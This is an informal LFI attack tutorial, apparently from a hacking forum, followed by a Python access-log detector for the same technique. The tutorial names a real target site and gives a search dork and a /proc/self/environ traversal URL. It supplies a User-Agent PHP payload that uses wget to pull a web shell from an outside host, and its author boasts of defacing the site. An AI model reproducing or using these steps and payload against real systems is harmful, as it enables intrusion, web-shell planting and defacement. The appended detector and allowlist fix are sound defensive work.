Hello, I'm Eagle Eye.
Today I'm going to give you an LFI attack tutorial.
Make sure you use Firefox.
You must have Tamper Data.
And a brain :D
::Follow this step::
First you must enter a dork:
inurl:.php?page=contact.php
Not all sites are vulnerable to this attack.
After that, choose any site that you want.
After you get your victim URL,
we must find process work
ok for example
http://www.neolanz.com/index.php?page=contact.php
Replace the thing in front of page=
It will be like this:
(url)index.php?page=( the thing that we must put )
The thing that we have to put is
with a lot of ../../../../../../../../proc/self/environ
Then the URL will be like this:
(url)index.php?page=../../../../../../../../proc/self/environ
So my victim URL will be like
http://www.neolanz.com/index.php?page=../../../../../../../../proc/self/environ
This is my site (you can try this site).
After that ...
the site will show something like
DOCUMENT_ROOT
It means vulnerable :D
Now open your Tamper Data to change the user agent from whatever it is to
Open Tamper Data,
then click Start Tamper Data.
After clicking Start Tamper Data
you must reload your page.
Then something will pop up.
You click Tamper.
copy this code ...
<?system('wget http://www.triview.nl/portals/0/shell.txt -O shell.php');?>
Copy and paste it into the User-Agent,
then click OK!
Then stop Tamper Data!
You will be able to see your shell at the end of the URL :)
http://www.neolanz.com/shell.php
DONE!
My defaced site ---> http://www.neolanz.com/
Special thanks to Mohd Izzat for uploading the shell while I was making this tutorial -_-
THANK YOU!
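Seen from the server side, the technique above leaves a distinctive trace in the access log: a page= value that resolves to /proc/self/environ, sent together with a PHP open tag in a request header. The following detector is an added example, not part of the original post; it assumes the Apache/nginx "combined" log format, and the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# "combined" format: ip - - [ts] "METHOD target PROTO" status size "referer" "user-agent"
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
                     r'\d{3} \S+ "(?P<referer>[^"]*)" "(?P<ua>.*)"$')

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (%252e -> %2e -> .) and normalise separators."""
    for _ in range(rounds):
        value = unquote(value)
    return value.replace("\\", "/")

def classify(line):
    """Return (ip, set_of_findings) for one log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    findings = set()
    for _, raw in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
        value = fully_decode(raw)
        if "../" in value:
            findings.add("traversal")
        if "proc/self/environ" in value:
            findings.add("proc-environ")
    # Request headers end up in the process environment, so a PHP tag here matters.
    if "<?" in m["ua"] or "<?" in m["referer"]:
        findings.add("php-in-header")
    return m["ip"], findings

def scan(lines):
    """Map client IP -> worst verdict seen: 'probe' or 'injection'."""
    verdicts = {}
    for parsed in map(classify, lines):
        if not parsed or not parsed[1]:
            continue
        ip, findings = parsed
        if {"proc-environ", "php-in-header"} <= findings:
            verdicts[ip] = "injection"
        else:
            verdicts.setdefault(ip, "probe")
    return verdicts

# Constructed sample lines (documentation IP ranges, harmless marker in the User-Agent).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=contact.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?page=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 90 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2023:13:56:40 +0000] "GET /index.php?page=../../../../proc/self/environ HTTP/1.1" 200 2048 "-" "<?php /* constructed marker */ ?>"',
]
```

Detection only tells you it happened. The fix is in the application: map the page parameter to an allowlist of known templates instead of passing request input to include.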